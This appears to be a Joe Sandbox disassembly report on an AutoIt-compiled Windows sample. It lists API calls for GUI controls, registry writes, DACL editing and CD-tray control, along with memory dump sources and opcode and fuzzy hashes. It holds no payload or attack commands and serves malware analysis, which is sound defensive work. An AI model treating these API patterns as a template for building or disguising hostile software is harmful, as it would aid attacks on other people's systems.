                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 00F91D6C
                                                                                                                                                                                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 00F91D84
                                                                                                                                                                                                                                                                                        • MonitorFromPoint.USER32(?,?,00000002), ref: 00F91DAA
                                                                                                                                                                                                                                                                                        • GetMonitorInfoW.USER32(00000000,?), ref: 00F91DC4
                                                                                                                                                                                                                                                                                        • CopyRect.USER32(?,?), ref: 00F91DDB
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,00000412,00000000), ref: 00F91E46
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                                                                                                                                                                                                        • String ID: ($0$tooltips_class32
                                                                                                                                                                                                                                                                                        • API String ID: 698492251-4156429822
                                                                                                                                                                                                                                                                                        • Opcode ID: 16461e248482cb5b42f82c3883ac198885d749ab0723aaceba059229d301505b
                                                                                                                                                                                                                                                                                        • Instruction ID: 9b218c8cbb1de310dad1b663d2eeef49e4371c863712c83fd05fad558a1c5504
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 16461e248482cb5b42f82c3883ac198885d749ab0723aaceba059229d301505b
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A7B18E71604302AFEB14DF64C984B5AFBE5FF84350F00892DF5999B2A1C731E845EB92
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • CharUpperBuffW.USER32(?,?), ref: 00F90D81
                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 00F90DBB
                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 00F90E25
                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 00F90E8D
                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 00F90F11
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00F90F61
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00F90FA0
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F1FD52: _wcslen.LIBCMT ref: 00F1FD5D
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F62B8C: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00F62BA5
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F62B8C: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00F62BD7
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                                                                                                                                                                                                                        • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                                                                                                                                                                                                                        • API String ID: 1103490817-719923060
                                                                                                                                                                                                                                                                                        • Opcode ID: 34c2ac0fa51f491150048fe357aa86833b97dacbde62c6abfb961ebd25a32460
                                                                                                                                                                                                                                                                                        • Instruction ID: 0b9aee6059baec5dc3e3abbba8b97dff69aff94b48427ea531f71fd0b8ded709
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 34c2ac0fa51f491150048fe357aa86833b97dacbde62c6abfb961ebd25a32460
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C2E1E1326083028FDB14DF24C95197AB3E6FF84364B14496CF8969B3A2DB35ED45EB81
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00F025F8
                                                                                                                                                                                                                                                                                        • GetSystemMetrics.USER32(00000007), ref: 00F02600
                                                                                                                                                                                                                                                                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00F0262B
                                                                                                                                                                                                                                                                                        • GetSystemMetrics.USER32(00000008), ref: 00F02633
                                                                                                                                                                                                                                                                                        • GetSystemMetrics.USER32(00000004), ref: 00F02658
                                                                                                                                                                                                                                                                                        • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00F02675
                                                                                                                                                                                                                                                                                        • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00F02685
                                                                                                                                                                                                                                                                                        • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00F026B8
                                                                                                                                                                                                                                                                                        • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00F026CC
                                                                                                                                                                                                                                                                                        • GetClientRect.USER32(00000000,000000FF), ref: 00F026EA
                                                                                                                                                                                                                                                                                        • GetStockObject.GDI32(00000011), ref: 00F02706
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 00F02711
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F019CD: GetCursorPos.USER32(?), ref: 00F019E1
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F019CD: ScreenToClient.USER32(00000000,?), ref: 00F019FE
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F019CD: GetAsyncKeyState.USER32(00000001), ref: 00F01A23
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F019CD: GetAsyncKeyState.USER32(00000002), ref: 00F01A3D
                                                                                                                                                                                                                                                                                        • SetTimer.USER32(00000000,00000000,00000028,00F0199C), ref: 00F02738
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                                                                                                                                                                                                        • String ID: AutoIt v3 GUI
                                                                                                                                                                                                                                                                                        • API String ID: 1458621304-248962490
                                                                                                                                                                                                                                                                                        • Opcode ID: 98a1e441b9415fe79721d7c80cb4d9ea38d528139a8f88520bd56feac4034fed
                                                                                                                                                                                                                                                                                        • Instruction ID: 86c73d4b4cab209d92b6d8350daece983af7ef6c57f92f13b3e3ac1afece8d0a
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 98a1e441b9415fe79721d7c80cb4d9ea38d528139a8f88520bd56feac4034fed
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E4B18B31A002099FDB14DFA8CC99BAE7BB5FB48324F10422AFA05A72D0C774E941FB55
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F61A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00F61A60
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F61A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,00F614E7,?,?,?), ref: 00F61A6C
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F61A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00F614E7,?,?,?), ref: 00F61A7B
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F61A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00F614E7,?,?,?), ref: 00F61A82
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F61A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00F61A99
                                                                                                                                                                                                                                                                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00F61741
                                                                                                                                                                                                                                                                                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00F61775
                                                                                                                                                                                                                                                                                        • GetLengthSid.ADVAPI32(?), ref: 00F6178C
                                                                                                                                                                                                                                                                                        • GetAce.ADVAPI32(?,00000000,?), ref: 00F617C6
                                                                                                                                                                                                                                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00F617E2
                                                                                                                                                                                                                                                                                        • GetLengthSid.ADVAPI32(?), ref: 00F617F9
                                                                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00F61801
                                                                                                                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 00F61808
                                                                                                                                                                                                                                                                                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00F61829
                                                                                                                                                                                                                                                                                        • CopySid.ADVAPI32(00000000), ref: 00F61830
                                                                                                                                                                                                                                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00F6185F
                                                                                                                                                                                                                                                                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00F61881
                                                                                                                                                                                                                                                                                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00F61893
                                                                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00F618BA
                                                                                                                                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 00F618C1
                                                                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00F618CA
                                                                                                                                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 00F618D1
                                                                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00F618DA
                                                                                                                                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 00F618E1
                                                                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00F618ED
                                                                                                                                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 00F618F4
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F61ADF: GetProcessHeap.KERNEL32(00000008,00F614FD,?,00000000,?,00F614FD,?), ref: 00F61AED
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F61ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,00F614FD,?), ref: 00F61AF4
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F61ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00F614FD,?), ref: 00F61B03
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 4175595110-0
                                                                                                                                                                                                                                                                                        • Opcode ID: e055cda8eab798522e2099066c86b96a5b9dd1c1c49387c4ab5b8709c8b7bb5f
                                                                                                                                                                                                                                                                                        • Instruction ID: 317d1eb4eb651e693f907ab4f7d8105275e8c66b3b3613eea78b2cd99f7bac6c
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e055cda8eab798522e2099066c86b96a5b9dd1c1c49387c4ab5b8709c8b7bb5f
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 44714AB2D00209AFDF10DFA5DC45FAEBBB8BF44350F284226F915A71A1D7359A05EB60
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F8CF1D
                                                                                                                                                                                                                                                                                        • RegCreateKeyExW.ADVAPI32(?,?,00000000,00F9DCD0,00000000,?,00000000,?,?), ref: 00F8CFA4
                                                                                                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 00F8D004
                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 00F8D054
                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 00F8D0CF
                                                                                                                                                                                                                                                                                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 00F8D112
                                                                                                                                                                                                                                                                                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 00F8D221
                                                                                                                                                                                                                                                                                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 00F8D2AD
                                                                                                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00F8D2E1
                                                                                                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00F8D2EE
                                                                                                                                                                                                                                                                                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 00F8D3C0
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                                                                                                                                                                                                                                                                        • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                                                                                                                                                                                        • API String ID: 9721498-966354055
                                                                                                                                                                                                                                                                                        • Opcode ID: 7b84f76fb0ebbe71272c5bad86ea63ffc4ace2bfa0b0e26d4c55f15edbddd4ee
                                                                                                                                                                                                                                                                                        • Instruction ID: eef04bbca032e16fd2aa6d3da845dcf846c00d7717ae124fa5e1ec7a61716020
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7b84f76fb0ebbe71272c5bad86ea63ffc4ace2bfa0b0e26d4c55f15edbddd4ee
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EC127A356046019FD714EF14C881F6AB7E5EF88724F04885DF88A9B3A2CB35ED02EB91
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • CharUpperBuffW.USER32(?,?), ref: 00F91462
                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 00F9149D
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00F914F0
                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 00F91526
                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 00F915A2
                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 00F9161D
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F1FD52: _wcslen.LIBCMT ref: 00F1FD5D
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F63535: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00F63547
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                                                                                                                                                                                                                        • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                                                                                                                                                                                                        • API String ID: 1103490817-4258414348
                                                                                                                                                                                                                                                                                        • Opcode ID: a0456e248e5bae1645c18c896daddb7dd7ac31e863e2ab621c3201dd020c7c2f
                                                                                                                                                                                                                                                                                        • Instruction ID: bac9bc03c8e85e7457a1c3eabdeb32a5ba210440cb1a9f1c871fe1f60ad5b02f
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a0456e248e5bae1645c18c896daddb7dd7ac31e863e2ab621c3201dd020c7c2f
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7DE1D232A04302CFDB10DF24C95096AB7E2FF94354B55496CF8969B3A2CB34ED46EB81
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: _wcslen$BuffCharUpper
                                                                                                                                                                                                                                                                                        • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                                                                                                                                                                                                        • API String ID: 1256254125-909552448
                                                                                                                                                                                                                                                                                        • Opcode ID: c78795e6f6c694b1d496d80472270cc60189caf85423f9743be3c2f8a1659b56
                                                                                                                                                                                                                                                                                        • Instruction ID: 296105f4b9775b6908b88d759da569d07f2a9bca5a5e2b5629dc918f14586919
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c78795e6f6c694b1d496d80472270cc60189caf85423f9743be3c2f8a1659b56
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8471F632A0012A8BCB10FE7CCE51AFB33A1AF60774B250129F8569B2D5FA35DD45B790
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 00F98DB5
                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 00F98DC9
                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 00F98DEC
                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 00F98E0F
                                                                                                                                                                                                                                                                                        • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00F98E4D
                                                                                                                                                                                                                                                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00F96691), ref: 00F98EA9
                                                                                                                                                                                                                                                                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00F98EE2
                                                                                                                                                                                                                                                                                        • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00F98F25
                                                                                                                                                                                                                                                                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00F98F5C
                                                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 00F98F68
                                                                                                                                                                                                                                                                                        • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00F98F78
                                                                                                                                                                                                                                                                                        • DestroyIcon.USER32(?,?,?,?,?,00F96691), ref: 00F98F87
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00F98FA4
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00F98FB0
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
• Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                                                                                                                                                                                                                                                        • String ID: .dll$.exe$.icl
                                                                                                                                                                                                                                                                                        • API String ID: 799131459-1154884017
                                                                                                                                                                                                                                                                                        • Opcode ID: d10ff380afa7dbfc77a68daeac7438c70673a5cb0197f17c4de05833de10dcc4
                                                                                                                                                                                                                                                                                        • Instruction ID: d709f2df76945a59c4bee55deba33df233c6f7b55d9ecff3dd0de2566cc6a8f7
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d10ff380afa7dbfc77a68daeac7438c70673a5cb0197f17c4de05833de10dcc4
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2A61E071A00219BAFF14DFA4DC41BBE77A8AF09BA4F104106F915D60D1DBB4A941EBA0
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • CharLowerBuffW.USER32(?,?), ref: 00F7493D
                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 00F74948
                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 00F7499F
                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 00F749DD
                                                                                                                                                                                                                                                                                        • GetDriveTypeW.KERNEL32(?), ref: 00F74A1B
                                                                                                                                                                                                                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00F74A63
                                                                                                                                                                                                                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00F74A9E
                                                                                                                                                                                                                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00F74ACC
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: SendString_wcslen$BuffCharDriveLowerType
                                                                                                                                                                                                                                                                                        • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                                                                                                                                                                                        • API String ID: 1839972693-4113822522
                                                                                                                                                                                                                                                                                        • Opcode ID: 3775abf9545ee0a96f2bcb90368f4d1e6d6ce048843a2beb1e2bc9b1d73d4a5e
                                                                                                                                                                                                                                                                                        • Instruction ID: ed194d3850e49010d75a3d02d494c090582a8f2c34897ea099eda55f09dbc67a
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3775abf9545ee0a96f2bcb90368f4d1e6d6ce048843a2beb1e2bc9b1d73d4a5e
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CD71D5729043029FC310EF24CC4196BB7E4EF94768F50892EF89597291EB35ED45EB92
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • LoadIconW.USER32(00000063), ref: 00F66395
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00F663A7
                                                                                                                                                                                                                                                                                        • SetWindowTextW.USER32(?,?), ref: 00F663BE
                                                                                                                                                                                                                                                                                        • GetDlgItem.USER32(?,000003EA), ref: 00F663D3
                                                                                                                                                                                                                                                                                        • SetWindowTextW.USER32(00000000,?), ref: 00F663D9
                                                                                                                                                                                                                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 00F663E9
                                                                                                                                                                                                                                                                                        • SetWindowTextW.USER32(00000000,?), ref: 00F663EF
                                                                                                                                                                                                                                                                                        • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00F66410
